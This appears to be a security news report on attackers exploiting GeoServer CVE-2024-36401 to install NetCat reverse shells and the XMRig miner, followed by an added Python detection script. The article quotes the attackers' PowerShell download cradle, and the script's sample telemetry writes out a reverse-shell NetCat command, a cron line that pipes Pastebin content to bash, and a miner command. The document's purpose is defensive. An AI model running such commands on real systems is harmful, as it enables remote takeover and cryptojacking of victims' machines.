Hackers Exploiting GeoServer RCE Vulnerability to Deploy CoinMiner

A critical remote code execution vulnerability in GeoServer has become a prime target for cybercriminals deploying cryptocurrency mining malware across global networks.

The vulnerability, designated CVE-2024-36401, affects the popular open-source Geographic Information System server written in Java, which provides essential platforms for spatial data processing in numerous organizations worldwide.

Since the vulnerability’s disclosure in 2024, threat actors have aggressively exploited unpatched GeoServer installations to execute malicious code remotely.

The attacks have escalated significantly, with cybercriminals systematically scanning for vulnerable servers and deploying sophisticated malware payloads that include both remote access tools and cryptocurrency miners.

The malware campaign demonstrates remarkable persistence and technical sophistication, targeting both Windows and Linux environments running vulnerable GeoServer installations.

ASEC analysts identified multiple attack instances in South Korea, where threat actors successfully compromised Windows-based GeoServer deployments that had not applied the necessary security patches for CVE-2024-36401.

The attack methodology reveals a multi-stage infection process that begins with remote code execution through PowerShell commands.

In documented cases, attackers executed malicious PowerShell scripts to download and install NetCat, a network utility that functions as a reverse shell, providing persistent remote access to compromised systems.

NetCat is launched with the “-e” argument, which binds a command shell to the outbound connection to the attackers' command-and-control servers and gives them continuous, interactive control of the system.

Cryptocurrency Mining Deployment and Persistence Mechanisms

The primary objective of these attacks centers on deploying XMRig, a Monero cryptocurrency miner that hijacks system resources for illicit mining operations. The threat actors demonstrate platform-aware tactics, utilizing PowerShell scripts for Windows environments and Bash scripts for Linux systems.

The Windows variant executes the command `IEX(New-Object Net.WebClient).DownloadString('hxxp://182.218.82.[1]4/js/1/gw.txt')` to retrieve and install XMRig components.

PowerShell script to install XMRig (Source – ASEC)

The figure above shows the PowerShell installation script; the corresponding Bash script used on Linux systems follows.

Bash script to install XMRig (Source – ASEC)

The Linux variant includes additional persistence mechanisms through Cron job registration, ensuring the malware maintains operational continuity even after system reboots. These Cron jobs execute scripts downloaded from Pastebin, creating multiple layers of persistence that complicate removal efforts.

The mining operations connect to pool.supportxmr.com:443, generating Monero cryptocurrency directly into attacker-controlled wallets while simultaneously degrading system performance and increasing operational costs for victims.
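To turn the chain described above into something a SOC can act on, here is an added detection example (not code from ASEC or from the article) that matches process command lines and cron entries against the campaign's observable traits: the PowerShell download cradle, NetCat launched with “-e”, cron jobs fetching from Pastebin, and a miner pointed at pool.supportxmr.com:443. Host names, the TEST-NET address 192.0.2.10 and the Pastebin/wallet placeholders in the sample telemetry are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Detection rules derived from the GeoServer/XMRig campaign described in the article.
# Each entry is (rule name, regex applied to a process command line or cron entry).
RULES = [
    # PowerShell download cradle: IEX(New-Object Net.WebClient).DownloadString(...)
    ("powershell_download_cradle",
     re.compile(r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString\(", re.I)),
    # NetCat started with -e, tying a shell to the outbound connection
    ("netcat_reverse_shell",
     re.compile(r"(?:^|[\s/\\])(?:nc|ncat|netcat)(?:\.exe)?\s+(?:.*\s)?-e\s+\S+", re.I)),
    # Cron persistence layer that pulls a script from Pastebin
    ("cron_pastebin_fetch",
     re.compile(r"(?:curl|wget)\s+[^|;]*pastebin\.com", re.I)),
    # Miner configured for the pool named in the report
    ("xmrig_supportxmr_pool",
     re.compile(r"pool\.supportxmr\.com:443", re.I)),
]

@dataclass
class Finding:
    host: str
    rule: str
    line: str

def scan_events(events):
    """events: iterable of (host, command_line). Returns one Finding per rule hit."""
    findings = []
    for host, cmdline in events:
        for name, rx in RULES:
            if rx.search(cmdline):
                findings.append(Finding(host, name, cmdline))
    return findings

# Constructed sample telemetry (not from the report); 192.0.2.10 is a TEST-NET address.
SAMPLE_EVENTS = [
    ("geo-win-01", "powershell.exe -nop -w hidden IEX(New-Object Net.WebClient)"
                   ".DownloadString('http://192.0.2.10/gw.txt')"),
    ("geo-win-01", "C:\\Windows\\Temp\\nc.exe 192.0.2.10 4444 -e cmd.exe"),
    ("geo-lnx-02", "*/5 * * * * curl -s https://pastebin.com/raw/PLACEHOLDER | bash"),
    ("geo-lnx-02", "./xmrig -o pool.supportxmr.com:443 -u WALLET_PLACEHOLDER -k"),
    ("geo-lnx-03", "/usr/bin/java -jar geoserver.jar"),  # benign GeoServer start
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule}")
```

Feed it Sysmon/auditd process-creation records or dumped crontabs; a hit on any rule on a GeoServer host that has not applied the CVE-2024-36401 patch warrants immediate triage.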


The post Hackers Exploiting GeoServer RCE Vulnerability to Deploy CoinMiner appeared first on Cyber Security News.

